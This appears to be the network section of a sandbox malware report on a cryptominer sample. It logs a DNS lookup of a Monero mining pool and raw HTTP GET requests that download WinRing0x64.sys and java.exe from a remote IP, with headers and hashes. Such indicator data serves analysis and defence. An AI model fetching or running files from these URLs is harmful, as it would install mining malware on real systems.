Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| xmr.f2pool.com |
CNAME
gf.f2pool.com
|
203.107.32.162 |
- UDP Requests
-
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:61480 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://154.91.1.118/WinRing0x64.sys
REQUEST
RESPONSE
BODY
GET /WinRing0x64.sys HTTP/1.1
User-Agent: NicoSoft/1.0.1 (+https://nicosoft.org)
Host: 154.91.1.118
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 14544
Accept-Ranges: bytes
Server: HFS 2.4.0 RC6
Set-Cookie: HFS_SID_=pwy60LO05UAAAGDxdZPuPw; path=/; HttpOnly
ETag: a363aafba321723eceb9c85d3eff3b92
Last-Modified: Mon, 06 Sep 2021 03:27:31 GMT
Content-Disposition: attachment; filename*=UTF-8''WinRing0x64.sys; filename=WinRing0x64.sys
GET
200
http://154.91.1.118/java.exe
REQUEST
RESPONSE
BODY
GET /java.exe HTTP/1.1
User-Agent: NicoSoft/1.0.1 (+https://nicosoft.org)
Host: 154.91.1.118
Cache-Control: no-cache
Cookie: HFS_SID_=pwy60LO05UAAAGDxdZPuPw
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 586752
Accept-Ranges: bytes
Server: HFS 2.4.0 RC6
ETag: 78a5de9d43965b6331dbb2af6af826a8
Last-Modified: Mon, 06 Sep 2021 04:14:40 GMT
Content-Disposition: attachment; filename*=UTF-8''java.exe; filename=java.exe
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts